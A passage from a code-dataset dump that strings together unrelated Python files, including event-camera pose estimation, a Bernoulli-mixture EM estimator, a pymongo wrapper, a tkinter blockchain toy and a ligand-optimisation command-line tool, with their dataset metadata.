string\")\r\nexceptioncontent()","sub_path":"PythonLabs/TryPractice.py","file_name":"TryPractice.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"633722928","text":"from pathlib import Path\nimport imageio\nfrom imageio import imwrite\nfrom skimage.color import hsv2rgb\nimport numpy as np\nfrom tqdm import tqdm\n\nfrom mpl_toolkits import mplot3d\nimport matplotlib.pyplot as plt\n\nimport h5py\nimport copy\nimport cv2\nimport sys\n\nfrom util import *\n\n\n\nskip_frames = 1\noffset_img_idx = 1968\ntotal_num_frames = 26605\nsensor_size = np.array([260, 346])\npadding = np.array([2, 5])\ncropped_size = sensor_size - 2 * padding\ncamIntrinsic = np.array([[223.9940010790056, 0, 170.7684322973841], [0, 223.61783486959376, 128.18711828338436], [0, 0, 1]])\n\n\n\nevents_path = \"/mnt/Data1/dataset/evflow-data/outdoor_day2/h5_events/outdoor_day2_data.h5\"\n# image_ts_path = \"/mnt/Data1/dataset/evflow-data/outdoor_day2/outdoor_day2_data.hdf5\" # outdoor2\ngt_path = \"/mnt/Data1/dataset/evflow-data/outdoor_day2/outdoor_day2_gt.hdf5\" # outdoor2\npre_gen_flow = \"/mnt/Data3/outdoor_day2_tf_output_trim_skip1.h5\"\n# pre_gen_flow = \"/mnt/Data2/EV_FlowNet_daniilidis/outdoor_day2_tf_output_trim_skip4.h5\"\n\n\n\n\n# gt_trans = np.empty([1, 3])\ngt_camera_frame = []\npredict_camera_frame = []\n\nwith h5py.File(pre_gen_flow, \"r\") as h5_file:\n for i in range(1, total_num_frames-skip_frames, skip_frames):\n\n if i < 400: continue\n if i > 440: break\n\n # Get events timestamp\n start_t = h5_file[\"prev_images\"][\"image{:09d}\".format(i)].attrs['timestamp']\n end_t = h5_file[\"next_images\"][\"image{:09d}\".format(i)].attrs['timestamp']\n start_ev_idx = binary_search_h5_timestamp(events_path, 0, None, start_t)\n end_ev_idx = binary_search_h5_timestamp(events_path, 0, None, end_t)\n\n # Get flow estimates\n flow = np.array(h5_file[\"flows\"][\"flow{:09d}\".format(i)])\n flow_img = vis_flow(flow)\n flow_img[-50:, -50:] = draw_color_wheel_np(50, 50)\n flow_mask = (np.abs(flow[:, :, 0]) > 0.01) & (np.abs(flow[:, :, 1]) > 0.01)\n\n # Get events\n events = get_events_by_idx(events_path, start_ev_idx, end_ev_idx)\n pos = get_pos_events(events)\n neg = get_neg_events(events)\n pos = crop_car_events(crop_center_events(pos, sensor_size, trim_size=padding))\n neg = crop_car_events(crop_center_events(neg, sensor_size, trim_size=padding))\n\n # Move events forward and backward\n pos_backward = move_flow_with_time(flow, pos, cropped_size, forward=False)\n pos_forward = move_flow_with_time(flow, pos, cropped_size, forward=True)\n neg_backward = move_flow_with_time(flow, neg, cropped_size, forward=False)\n neg_forward = move_flow_with_time(flow, neg, cropped_size, forward=True)\n\n # Get correpsondence points and R, t\n p1, p2 = get_random_selected_correspondence_points(pos_backward, pos_forward, num_track_points=100, mask=flow_mask)\n # n1, n2 = get_random_selected_correspondence_points(neg_backward, neg_forward, num_track_points=200, mask=flow_mask)\n # pt1 = np.vstack([p1, n1])\n # pt2 = np.vstack([p2, n2])\n\n E, mask = cv2.findEssentialMat(p1, p2, cameraMatrix=camIntrinsic, method=cv2.RANSAC, prob=0.999, threshold=1.5)\n points, R, t, mask = cv2.recoverPose(E, p1, p2, mask=mask)\n\n gt_pt1_idx = binary_search_h5_gt_timestamp(gt_path, 0, None, start_t, side='right')\n gt_pt2_idx = binary_search_h5_gt_timestamp(gt_path, 0, None, end_t, side='right')\n\n # Get ground truth\n with h5py.File(gt_path, \"r\") as gt_file:\n gt_pose = gt_file['davis']['left']['pose']\n gt_ts = gt_file['davis']['left']['pose_ts']\n\n gt_pt1_interp_begin_t = gt_ts[gt_pt1_idx]\n gt_pt1_interp_end_t = gt_ts[gt_pt1_idx + 1]\n gt_pt2_interp_begin_t = gt_ts[gt_pt2_idx]\n gt_pt2_interp_end_t = gt_ts[gt_pt2_idx + 1]\n\n gt_pose1_interp_begin = gt_pose[gt_pt1_idx]\n gt_pose1_interp_end = gt_pose[gt_pt1_idx + 1]\n gt_pose2_interp_begin = gt_pose[gt_pt2_idx]\n gt_pose2_interp_end = gt_pose[gt_pt2_idx + 1]\n\n ratio1 = (gt_pt1_interp_end_t - start_t) / (gt_pt1_interp_end_t - gt_pt1_interp_begin_t)\n ratio2 = (gt_pt2_interp_end_t - end_t) / (gt_pt2_interp_end_t - gt_pt2_interp_begin_t)\n twc1 = ratio1 * gt_pose1_interp_begin[0:3, 3] + (1 - ratio1) * gt_pose1_interp_end[0:3, 3]\n twc2 = ratio2 * gt_pose2_interp_begin[0:3, 3] + (1 - ratio2) * gt_pose2_interp_end[0:3, 3]\n\n twc1 = interp_rigid_matrix(gt_pose1_interp_begin, \n gt_pose1_interp_end, \n gt_pt1_interp_begin_t, \n gt_pt1_interp_end_t, \n start_t)\n\n twc2 = interp_rigid_matrix(gt_pose2_interp_begin, \n gt_pose2_interp_end, \n gt_pt2_interp_begin_t, \n gt_pt2_interp_end_t, \n end_t)\n\n t_c1_c2 = np.linalg.inv(twc1) @ twc2\n gt_camera_frame.append(t_c1_c2)\n\n # scale t\n t *= np.linalg.norm(twc2 - twc1)\n\n if i < 405:\n print(np.linalg.norm(twc2 - twc1))\n\n S = np.eye(4)\n S[0:3, 0:3] = R\n S[0:3, 3] = np.squeeze(t)\n predict_camera_frame.append(S)\n\n # raise\n\n # Visualize images, flow and event images\n rgb_img = np.array(h5_file[\"prev_images\"][\"image{:09d}\".format(i)])\n rgb_img = np.tile(rgb_img[..., np.newaxis], [1, 1, 3])\n\n pos_original = vis_events(pos, cropped_size)\n pos_backward_img = vis_events(pos_backward, cropped_size)\n pos_forward_img = vis_events(pos_forward, cropped_size)\n\n # neg_original = vis_events(neg, cropped_size)\n # neg_backward_img = vis_events(neg_backward, cropped_size)\n # neg_forward_img = vis_events(neg_forward, cropped_size)\n top = np.hstack([pos_original, rgb_img, flow_img])\n bot = np.hstack([pos_backward_img, pos_forward_img, pos_backward_img - pos_forward_img])\n\n # Draw correspondence points\n for pt1, pt2 in zip(p1, p2):\n x1, y1 = pt1\n x2, y2 = pt2\n\n x1 = int(x1)\n y1 = int(y1)\n x2 = int(x2 + cropped_size[1])\n y2 = int(y2)\n \n color = np.random.randint(0, 255, size=(1, 3), dtype=np.uint8).squeeze()\n color = (int(color [0]), int(color[1]), int(color[2]))\n bot = cv2.circle(bot, (x1, y1), radius=3, color=color, thickness=1)\n bot = cv2.circle(bot, (x2, y2), radius=3, color=color, thickness=1)\n bot = cv2.line(bot, (x1,y1), (x2,y2), color=color, thickness=1)\n\n img = np.vstack([top, bot])\n cv2.imshow(\"img\", img)\n cv2.waitKey(1)\n\n\n\ngt_camera_frame = np.array(gt_camera_frame)\npredict_camera_frame = np.array(predict_camera_frame)\n\nfor i in range(len(gt_camera_frame)-1):\n\n q_i = gt_camera_frame[i]\n q_i_1 = gt_camera_frame[i+1]\n q_i_inv = np.linalg.inv(q_i)\n\n p_i = predict_camera_frame[i]\n p_i_1 = predict_camera_frame[i+1]\n p_i_inv = np.linalg.inv(p_i)\n\n ei = np.linalg.inv(q_i_inv @ q_i_1) @ (p_i_inv @ p_i_1)\n\n trans = ei[0:3, 3]\n print(ei)\n print()\n norm_trans = np.linalg.norm(trans)\n\n # print(i, norm_trans)\n if i > 4:\n raise\n\n\n\nraise\n\n\n\n\n\n\n\n\n\n\n\n\n# Convert to world coordinate\ncoord_list = []\ntotal_trans = np.eye(4)\nlast_location = np.eye(4)\nfor i, p in enumerate(inv_pose_list):\n \n total_trans = total_trans @ p\n location = total_trans[:, 3]\n coord_list.append(location)\n\n # diff = np.linalg.norm(location - last_location)\n # print(diff)\n # last_location = total_trans[:, 3]\n\ncoord_list = np.array(coord_list)\n\n\n# Visualize path \nx = coord_list[:, 0]\ny = coord_list[:, 1]\n# z = np.zeros_like(x)\nz = coord_list[:, 2]\n\n\n# x = ground_truth_trans[1:, 0]\n# y = ground_truth_trans[1:, 1]\n# z = ground_truth_trans[1:, 2]\nidx = np.arange(len(x))\n\nfig = plt.figure()\nax = plt.axes(projection=\"3d\")\n\nax.plot3D(x, y, z, 'gray')\nax.scatter3D(x, y, z, c=idx, cmap='hsv')\nplt.show()\n\n# fig, axes = plt.subplots(nrows=1, ncols=2, figsize=(5, 3))\n# axes[0].plot(x1, y1)\n# axes[1].plot(x2, y2)\n# fig.tight_layout()","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":8272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"463555637","text":"import pyglet as pig\nfrom pyglet.window import key\nwindow = pig.window.Window()\n\nimage = pig.resource.image('logo.png')\n\nx = 0\ny = 0\n\n@window.event\ndef on_draw():\n global x,y\n window.clear()\n image.blit(x,y)\n\n@window.event\ndef on_key_press(symbol,modifier):\n global x,y\n if symbol == key.RIGHT:\n x = x+1\n print(\"moved right\")\nwindow.push_handlers(pig.window.event.WindowEventLogger()) \npig.app.run()\n","sub_path":"Graphics/small/bulletbill/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"449933061","text":"# -*- coding: utf-8 -*-\n# @Author : BrotherBe\n# @Time : 2020/9/9 0:20\n# @Version : Python 3.8.5\nimport warnings\n\nimport pymongo\nfrom pymongo.errors import ConfigurationError\n\nfrom .database import Database\n\n\nclass MongoClient(pymongo.MongoClient):\n def __init__(self,\n host=None,\n port=None,\n document_class=dict,\n tz_aware=None,\n connect=False,\n type_registry=None,\n **kwargs):\n super(MongoClient, self).__init__(host, port, document_class, tz_aware, connect, type_registry, **kwargs)\n\n def get_database(self, name=None, codec_options=None, read_preference=None,\n write_concern=None, read_concern=None):\n if name is None:\n if self.__default_database_name is None:\n raise ConfigurationError('No default database defined')\n name = self.__default_database_name\n\n return Database(self, name, codec_options, read_preference, write_concern, read_concern)\n\n def __getitem__(self, name) -> Database:\n warnings.warn(f\"Use get_database to get database {name}\", DeprecationWarning, stacklevel=2)\n warnings.warn(f\"Use get_database to get database {name}\", DeprecationWarning, stacklevel=3)\n return Database(self, name)\n","sub_path":"mongodbx/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"223017501","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import division\nimport numpy as np\nimport scipy as sc\nfrom scipy.stats import *\n\n## IMPORTING THE TARGETED FILE \nimport sys\nsys.path.insert(0, '/home/almutanabi/Desktop/IOKR/CODE_PROJECT/')\nfrom gener_data import *\n\n### ###\n### FONCTION D'ESTIMATION PAR MLE DES MODELE GRAPHIQUE ###\n### ###\n\n###### TEST WEIGHT RV\nprint(\"output of the weighted rv\")\n#funk_disrv(n,n1,p_vec)\n\n#### ESTIMATEUR MLE FOR A BERNOULLIT\ndef funk_mle_bernoulli(data):\n\treturn(np.mean(data))\n\n#### ESTIMATEUR MLE FOR A MULTINOMIAL\ndef funk_mle_multinomial(n,data):\n\treturn(np.mean(data,0)/n)\n\n#### ESTIMATEUR MLE FOR A NORMAL\ndef funk_mle_normal(data):\n\tres_mu = np.mean(data,0)\n\tres_cov = [np.matrix(data[i]-res_mu).T*np.matrix(data[i]-res_mu) for i in range(data.shape[0])]\n\tres_cov = sum(res_cov)/len(data) \n\treturn([res_mu,res_cov])\n\n\n#### TEST MIXTURE DE BERNOULLI\n\n\n## ESTIMATION EM POUR LA MIXTURE DE BERNOUILLI\ndef funk_prob_xmu(data,mu_vec,n,k):\n\tres1 = [mu_vec[k,i1]**data[n,i1] for i1 in range(data.shape[1])]\n\tres0 = [(1-mu_vec[k,i1])**(1-data[n,i1]) for i1 in range(data.shape[1])]\n\t#\tres0 = (1-mu_vec[k,:])**(1-data[n,:])\n\treturn(np.prod(np.multiply(res1,res0)))\n# update functions:\n\t#\tE-step:\ndef funk_update_gamma(pi_vec,prob_vec):\n\tres = np.zeros(prob_vec.shape)\n\tfor esc in range(prob_vec.shape[0]):\n\t\tvar_test = np.multiply(prob_vec[esc,:],pi_vec.T)\n\t\tif(np.sum(var_test,1) != 0):\n\t\t\tres[esc,:]= var_test/np.sum(var_test,1)\n\treturn(res)\ndef funk_update_NK(gamma):\n\treturn(np.sum(gamma,0))\ndef funk_update_xvec(data,gamma,N_vec):\n\treturn(np.multiply(np.matrix(N_vec**-1).T,(gamma.T*data)))\n\n\t#\tM-step:\n#mu_vec <- x_vec\ndef funk_update_pivec(N_vec,N):\n\treturn(N_vec*1/N)\n\n\n\n## PROBLEM IN THE UPDATES\ndef funk_estimate_mle_mixturebernoulli(data,iterr,N,K,D,gamma,N_vec, x_vec, mu_vec,pi_vec):\n\tfor esc in range(iterr):\n\t\t\t#\tE-step\n\t\t\tprob_vec = np.matrix([[funk_prob_xmu(data,mu_vec,i,j) for j in range(K)] for i in range(N)])\n\t\t\tgamma = funk_update_gamma(pi_vec,prob_vec)\n\t\t\tN_vec = funk_update_NK(gamma)\n\t\t\tx_vec = funk_update_xvec(data,gamma,N_vec)\n\t\t\t#\tM-step\n\t\t\tmu_vec = x_vec\n\t\t\tpi_vec = funk_update_pivec(N_vec,N)\n\t\t\t\n\treturn([pi_vec,mu_vec])\n\n### TEST\nN = 100 # ECHANTILLON\nD= 2 # SIZE OF THE BERNOULLI\nK= 5 # NUMBER OF CLASS\nmixt_vec = np.random.rand(1,K); mixt_vec = mixt_vec*1/np.sum(mixt_vec,1)\nmixt_vec = [6/10,1/10,2/10,1/10]\np_vec = np.random.rand(K,D);p_vec = np.multiply(p_vec,np.matrix(np.sum(p_vec,1)**-1).T)\ndata = np.matrix([funk_mixture_bernoulli(mixt_vec,p_vec,D) for i in range(N)])\n\ngamma = np.ones((N,K))*1/K # gamma(y_{n,k}\nN_vec = np.ones((K,1))*0 # Vector of effective numbers of data points associated with each component k\nx_vec = np.ones((K,D))*1/D # mean vector per class k\nmu_vec = np.ones((K,D))*1/D # (mu_{k})_{k\\in {1,...,K}\npi_vec = np.ones((K,1))*1/(2*K) # (pi_{k})_{k\\in {1,...,K}\niterr= 200\n\ntest = funk_estimate_mle_mixturebernoulli(data,iterr,N,K,D,gamma,N_vec, x_vec, mu_vec,pi_vec)\n\n\n# TEST ONE BY ONE\ngamma = np.ones((N,K))*1/K # gamma(y_{n,k}\nN_vec = np.ones((K,1))*0 # Vector of effective numbers of data points associated with each component k\nx_vec = np.ones((K,D))*1/D # mean vector per class k\nmu_vec = np.zeros((K,D)) # (mu_{k})_{k\\in {1,...,K}\npi_vec = np.ones((K,1))*1/K # (pi_{k})_{k\\in {1,...,K}\n\nesc = 0\nesc += 1 \n#\tE-step\nprob_vec = np.matrix([[funk_prob_xmu(data,mu_vec,i,j) for j in range(K)] for i in range(N)])\ngamma = funk_update_gamma(pi_vec,prob_vec)\nN_vec = np.round(funk_update_NK(gamma))\nx_vec = funk_update_xvec(data,gamma,N_vec)\n#\tM-step\nmu_vec = x_vec\npi_vec = funk_update_pivec(N_vec,N)\n\t\t\n\n\n\n\n#### TEST MIXTURE DE MULTINOMIAL\nprint(\"output of the mixture of multinomial\")\nn=1\nns=5\nk1= 9\nk2= 4\nmixt_vec = [1/k1]*k1\np_vec = np.random.rand(k1,k2)\np_vec = p_vec.T/sum(p_vec.T,0)\n\nfunk_mixture_multinomial(mixt_vec,p_vec,n,ns)\n\n\n#### TEST MIXTURE DE NORMAL \nprint(\"output of the mixture of normal\")\nn=100\nk1=1\nk2=2\nmixt_vec = [1/k2]*k2\nmu_vec = np.random.rand(k1,k2)\nsigma_vec = np.random.rand(k1,k1,k2)\nfor i in range(k2):\n\tc= sigma_vec[:,:,i]\n\tc=c-np.diag(np.diag(c))+ np.eye(c.shape[1])\n\tsigma_vec[:,:,i]=c\n\ntest = funk_mixture_normal(mixt_vec,mu_vec,sigma_vec,n)\n\n\n\n\n\n\n\n\n","sub_path":"CODE_PROJECT/estimation_mle.py","file_name":"estimation_mle.py","file_ext":"py","file_size_in_byte":4302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"289741234","text":"# this script reads in all the data for each subject for the learning and memory tasks, builds a DataFrame, and trusn it into a .csv for use with HDDM\n\nfrom pylab import *\nfrom scipy.io import loadmat #used to load .mat files in as dictionaries\nimport pandas as pd\nfrom glob import glob #for use in searching for/ finding data files\n\ndatapath = '/Users/jameswilmott/Documents/Research/Computational Modeling Workshop/ChallengeData/'; #specify the datapath\nsavepath = '/Users/jameswilmott/Documents/Research/Computational Modeling Workshop/ChallengeData/'; #save the .csvs in the same place\n\nids = linspace(1,90,90);\n\n################################################################################################\n#define a function to import individual .mat data files\ndef loadBlock(subid,block_type):\n #returns a single Block object corresponding to the block number and subject id\n #block type should be a string corresponding to the task type(e.g. 'learn' or 'memory'\n filename = glob(datapath+'%sSub%s.mat'%(block_type,subid)); #Not sure if this regex will work here, must check\n matdata = loadmat(filename[0],struct_as_record=False,squeeze_me=True); #use scipy loadmat() to load in the files\n \n 1/0;\n \n block=Block(matdata); #here, create Block object with dictionary of trial data in matdata\n return block;\n################################################################################################\n\n\n#import the data from the learning experiment\nblock_type = 'learn';\n\nlearn_data = [loadBlock(id,block_type) for id in ids]; #create a list to hold the learning blocks\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"challenge_code/constructCSV.py","file_name":"constructCSV.py","file_ext":"py","file_size_in_byte":1622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"136624237","text":"import numpy as np\nimport math\n\nclass Actor_stats:\n\n def __init__(self):\n # Core stats, inherited from genetics\n self.st = int(np.random.normal(10.0, 1.5));\n self.dx = int(np.random.normal(10.0, 1.5));\n self.iq = int(np.random.normal(10.0, 1.5));\n self.ht = int(np.random.normal(10.0, 1.5)); \n\n # Derrived stats\n self.per = int(self.iq + np.random.normal(0.0, 1.0));\n self.will = int(self.iq + np.random.normal(0.0, 1.0));\n # only thrusting damage, need to write formula for this.\n self.dmg = (int(self.st / 18 + 1), int(self.st / 3 - 6));\n self.lift = (self.st * self.st) / 5 + np.random.normal(10.0, 5);\n self.speed = (self.ht + self.dx) / 4;\n self.move = math.floor(self.speed);\n self.fp = self.ht;\n self.hp = self.st;\n\n self.st_mod = 0;\n self.iq_mod = 0;\n self.dx_mod = 0;\n self.ht_mod = 0;\n\n self.options = { 'st': self.st,\n 'iq': self.iq,\n 'dx': self.dx,\n 'ht': self.ht,\n }\n\n def mutate_stats(self, mut_factor):\n return -1;\n\n def roll(self, attribute, mods):\n dice = np.random.random_integers(1, high=6, size=3)\n d_sum = sum(dice) + mods;\n if d_sum <= self.options[attribute]:\n return True;\n else: return False;\n \n \n\n\n \n","sub_path":"Actor_stats.py","file_name":"Actor_stats.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"346343990","text":"# uncompyle6 version 3.7.4\n# Python bytecode 3.5 (3351)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: build/bdist.linux-x86_64/egg/pynestml/exceptions/implicit_magnitude_cast_exception.py\n# Compiled at: 2020-03-05 05:49:41\n# Size of source mod 2**32: 944 bytes\n\n\nclass ImplicitMagnitudeCastException(Exception):\n\n def __init__(self, code, message, conversion_factor):\n self.code = code\n self.message = message\n self.conversion_factor = conversion_factor","sub_path":"pycfiles/NESTML-3.1-py3.5/implicit_magnitude_cast_exception.cpython-35.py","file_name":"implicit_magnitude_cast_exception.cpython-35.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"10090191","text":"from tkinter import *\nfrom tkinter.ttk import Frame, Label, Entry, Button\nimport tkinter.messagebox\nimport datetime as timehelper\nfrom Block import Block\n\nroot = Tk()\nblocks = []\n\n# def update_listbox():\n# \t#Clear the current list\n# \tclear_chain()\n# \t#Populate the listbox\n# \tfor task in tasks:\n# \t\tlb_tasks.insert(\"end\", task)\n#\n#\n# def clear_chain():\n# \tlb_tasks.delete(0, \"end\")\n\nclass BlockchainFrm(Frame):\n\n def __init__(self, parent):\n Frame.__init__(self, parent)\n self.pack(padx=5,pady=10)\n self.parent = parent\n self.initUI()\n self.isEdit = False\n self.index = 0\n\n def initUI(self):\n self.parent.title(\"Chain Of Block\")\n self.pack(fill=X, expand=False)\n\n frame2 = Frame(self)\n frame2.pack(fill=X)\n\n self.lbl2 = Label(frame2, text=\"Data\", width=8)\n self.lbl2.pack(fill=X, side=LEFT, padx=3, pady=5)\n\n self.entry2 = Entry(frame2)\n self.entry2.pack(fill=X, side=LEFT, padx=2, expand=False)\n\n btnCheckValid = Button(frame2, text=\"Check\", command=self.check_valid)\n btnCheckValid.pack(fill=X, side=RIGHT)\n\n self.edtBtn = Button(frame2, text=\"Edit Block\", command=self.turn_on_edit)\n self.edtBtn.pack(fill=X, side=RIGHT)\n\n btnSave = Button(frame2, text=\"Add Block\", command=self.add_block)\n btnSave.pack(fill=X,side=RIGHT)\n\n frame3 = Frame(self)\n frame3.pack(fill=BOTH, expand=False)\n\n self.lstView = Listbox(frame3, width=1000)\n self.lstView.pack(side=BOTTOM, padx=2, pady=2)\n self.lstView.bind(\"<>\", self.onSelect)\n\n def turn_on_edit(self):\n if (self.isEdit):\n self.isEdit = False\n self.edtBtn.config(text='Edit Block')\n blocks[self.index].data = self.entry2.get()\n bl = blocks[self.index]\n self.lstView.delete(self.index)\n self.lstView.insert(self.index,str(bl.index) +'. ' +str(bl.data) + ' ' + str(bl.timestamp.strftime('%d/%m/%y %H:%M:%S'))+ ' ' + str(bl.hash))\n\n self.reload_chain()\n else:\n self.isEdit = True\n self.edtBtn.config(text='Save Change')\n self.entry2.delete(0,'end')\n\n\n\n def add_block(self):\n # Get the task to add\n data = self.entry2.get()\n num = len(blocks)\n if (len(blocks) == 0):\n bl = Block(num,data,'0')\n else:\n bl = Block(num, data, blocks[-1].hash)\n\n blocks.append(bl)\n\n self.reload_chain()\n\n def reload_chain(self):\n self.lstView.delete(0,'end')\n for i in blocks:\n self.lstView.insert(END,str(i.index) +'. ' +str(i.data) + ' ' + str(i.timestamp.strftime('%d/%m/%y %H:%M:%S')) + ' ' + str(i.hash))\n\n\n def onSelect(self, val):\n\n sender = val.widget\n self.index = sender.curselection()[0]\n if (self.isEdit):\n self.entry2.delete(0, 'end')\n self.entry2.insert(0, str(blocks[int(self.index)].data))\n\n self.entry2.focus()\n else:\n bl = blocks[self.index]\n rs = tkinter.messagebox.showinfo(\"Infomation\",\n \"Data: \" + str(bl.data)\n + \"\\nCreateDate: \" + str(bl.timestamp)\n + \"\\nKey: \" + str(bl.hash)\n + \"\\nPrevious Key: \" + str(bl.previous_hash))\n\n def checkValidKey(self):\n for i in range(1,len(blocks)-1):\n crrBl = blocks[i]\n prvBl = blocks[i-1]\n if (crrBl.hash != crrBl.hash_block()):\n return False\n if (crrBl.previous_hash != prvBl.hash):\n return False\n return True\n\n def check_valid(self):\n if self.checkValidKey():\n tkinter.messagebox.showinfo(\"Good Security\",\"Nice Blockchain\")\n else:\n tkinter.messagebox.showerror(\"ERRORRRRRRR!!!\",\"Having Security Error\")\n\n\n\nroot.geometry(\"550x200+200+300\")\napp = BlockchainFrm(root)\nroot.mainloop()","sub_path":"venv/Include/BlockchainForm.py","file_name":"BlockchainForm.py","file_ext":"py","file_size_in_byte":4085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"172370079","text":"#!/usr/local/bin/env python\n\nimport os\nimport shutil\nimport logging\n\nfrom .ligcharopt import LigCharOpt\nfrom docopt import docopt\n\nlogger = logging.getLogger(__name__)\n\n# =============================================================================================\n# COMMAND-LINE INTERFACE\n# =============================================================================================\n\nusage = \"\"\"\nLIGCHAROPT\nUsage:\n LigCharOpt [--output_folder=STRING] [--mol_name=STRING] [--ligand_name=STRING] [--complex_name=STRING] [--solvent_name=STRING]\n [--yaml_path=STRING] [--o_atom_list=LIST] [--c_atom_list=LIST] [--h_atom_list=LIST] [--num_frames=INT] [--net_charge=INT]\n [--gaff_ver=INT] [--equi=INT] [--num_fep=INT] [--auto_select=STRING] [--charge_only=BOOL] [--vdw_only=BOOL] [--optimize=BOOL]\n [--num_gpu=INT] [--opt_name=STRING] [--rmsd=FLOAT] [--opt_steps=INT] [--central_diff=BOOL] [--job_type=STRING]...\n\"\"\"\n\n\ndef run_automatic_pipeline(yaml_file_path, complex_name, solvent_name):\n \"\"\"Run YANK's automatic pipeline.\"\"\"\n from yank.experiment import ExperimentBuilder\n exp_builder = ExperimentBuilder(yaml_file_path)\n\n # Modify the output directory of the setup to be consistent\n # with the hardcoded paths in Fluorify and FSim. The searched\n # path is 'input/complex_name/complex_name.pdb' so we also\n # need to modify the name of the system.\n exp_builder.output_dir = '.'\n exp_builder.setup_dir = 'input'\n\n # Run the automatic pipeline.\n exp_builder.setup_experiments()\n assert len(exp_builder._db.systems) == 1, 'Setting up multiple systems is not currently supported'\n system_name = next(iter(list(exp_builder._db.systems.keys())))\n\n # Copy YANK setup files to match the Fluorify folder structure.\n for phase_name, user_phase_name in zip(['complex', 'solvent'], [complex_name, solvent_name]):\n # Create Fluorify directory structure.\n fluorify_phase_dir = os.path.join('input', user_phase_name)\n os.makedirs(fluorify_phase_dir, exist_ok=True)\n for extension in ['.prmtop', '.pdb']:\n yank_file_path = os.path.join(exp_builder.setup_dir, 'systems', system_name, phase_name + extension)\n fluorify_file_path = os.path.join(fluorify_phase_dir, user_phase_name + extension)\n shutil.copyfile(yank_file_path, fluorify_file_path)\n\n\ndef main(argv=None):\n args = docopt(usage, argv=argv, options_first=True)\n\n msg = 'No {0} specified using default {1}'\n\n if args['--complex_name']:\n complex_name = args['--complex_name']\n else:\n complex_name = 'complex'\n logger.debug(msg.format('complex name', complex_name))\n\n if args['--solvent_name']:\n solvent_name = args['--solvent_name']\n else:\n solvent_name = 'solvent'\n logger.debug(msg.format('solvent name', solvent_name))\n\n # Run the setup pipeline.\n if args['--yaml_path']:\n run_automatic_pipeline(args['--yaml_path'], complex_name, solvent_name)\n\n if args['--mol_name']:\n mol_name = args['--mol_name']\n else:\n mol_name = 'ligand'\n logger.debug(msg.format('mol file', mol_name + '.mol2'))\n\n if args['--ligand_name']:\n ligand_name = args['--ligand_name']\n else:\n ligand_name = 'MOL'\n logger.debug(msg.format('ligand residue name', ligand_name))\n\n if args['--num_frames']:\n num_frames = int(args['--num_frames'])\n else:\n num_frames = 500\n logger.debug(msg.format('number of frames', num_frames))\n\n if args['--equi']:\n equi = int(args['--equi'])\n else:\n equi = 250\n logger.debug(msg.format('Number of equlibriation steps', equi))\n\n if args['--net_charge']:\n net_charge = int(args['--net_charge'])\n else:\n net_charge = None\n logger.debug(msg.format('net charge', net_charge))\n\n if args['--gaff_ver']:\n gaff_ver = int(args['--gaff_ver'])\n if gaff_ver != 1 and gaff_ver != 2:\n raise ValueError('Can only use gaff ver. 1 or 2')\n else:\n gaff_ver = 2\n logger.debug(msg.format('gaff version', gaff_ver))\n\n if args['--charge_only']:\n charge_only = int(args['--charge_only'])\n else:\n charge_only = False\n if args['--vdw_only']:\n vdw_only = int(args['--vdw_only'])\n else:\n vdw_only = False\n if charge_only and vdw_only:\n raise ValueError('charge_only and vdw_only conflicting options')\n if charge_only == True:\n logger.debug('Mutating ligand charges only...')\n elif vdw_only == True:\n logger.debug('Mutating ligand VDW only...')\n else:\n logger.debug('Mutating all ligand parameters...')\n\n if args['--optimize']:\n opt = int(args['--optimize'])\n else:\n opt = False\n if opt == True:\n logger.debug('Optimizing ligand parameters...')\n c_atom_list = None\n h_atom_list = None\n o_atom_list = None\n auto_select = None\n job_type = 'optimize'\n if args['--central_diff']:\n central_diff = int(args['--central_diff'])\n else:\n central_diff = True\n logger.debug(msg.format('finite difference method', 'central difference'))\n optimizer_names = ['scipy', 'FEP_only', 'SSP_convergence_test', 'FEP_convergence_test', 'FS_test']\n if args['--opt_name']:\n opt_name = args['--opt_name']\n if opt_name not in optimizer_names:\n raise ValueError('Unknown optimizer specified chose from {}'.format(optimizer_names))\n else:\n opt_name = 'scipy'\n logger.debug(msg.format('optimization method', opt_name))\n if args['--opt_steps']:\n opt_steps = int(args['--opt_steps'])\n else:\n opt_steps = 10\n logger.debug(msg.format('number of optimization steps', opt_steps))\n if args['--rmsd']:\n rmsd = float(args['--rmsd'])\n else:\n rmsd = 0.03\n logger.debug(msg.format('optimization rmsd', rmsd))\n else:\n logger.debug('Scanning ligand...')\n if args['--central_diff']:\n raise ValueError('Finite difference method option only compatible with an optimization')\n else:\n central_diff = None\n if args['--opt_name']:\n raise ValueError('Optimization method option only compatible with an optimization')\n else:\n opt_name = None\n if args['--opt_steps']:\n raise ValueError('Number of optimization steps option only compatible with an optimization')\n else:\n opt_steps = None\n if args['--rmsd']:\n raise ValueError('Optimization rmsd option only compatible with an optimization')\n else:\n rmsd = None\n if args['--c_atom_list']:\n c_atom_list = []\n pairs = args['--c_atom_list']\n pairs = pairs.replace(\" \", \"\")\n pairs = pairs.split('and')\n for pair in pairs:\n tmp = []\n pair = pair.split(',')\n for atom in pair:\n tmp.append(atom)\n c_atom_list.append(tmp)\n else:\n c_atom_list = None\n\n if args['--h_atom_list']:\n h_atom_list = []\n pairs = args['--h_atom_list']\n pairs 